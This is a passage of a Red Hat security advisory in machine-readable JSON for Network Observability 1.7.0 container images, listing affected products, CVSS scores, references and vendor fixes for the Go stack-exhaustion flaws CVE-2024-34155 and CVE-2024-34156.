"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34155"
},
{
"category": "external",
"summary": "RHBZ#2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155"
},
{
"category": "external",
"summary": "https://go.dev/cl/611238",
"url": "https://go.dev/cl/611238"
},
{
"category": "external",
"summary": "https://go.dev/issue/69138",
"url": "https://go.dev/issue/69138"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3105",
"url": "https://pkg.go.dev/vuln/GO-2024-3105"
}
],
"release_date": "2024-09-06T21:15:11.947000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion"
},
{
"cve": "CVE-2024-34156",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:09.377905+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310528"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Go\u0027s `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34156"
},
{
"category": "external",
"summary": "RHBZ#2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156"
},
{
"category": "external",
"summary": "https://go.dev/cl/611239",
"url": "https://go.dev/cl/611239"
},
{
"category": "external",
"summary": "https://go.dev/issue/69139",
"url": "https://go.dev/issue/69139"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3106",
"url": "https://pkg.go.dev/vuln/GO-2024-3106"
}
],
"release_date": "2024-09-06T21:15:12.020000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
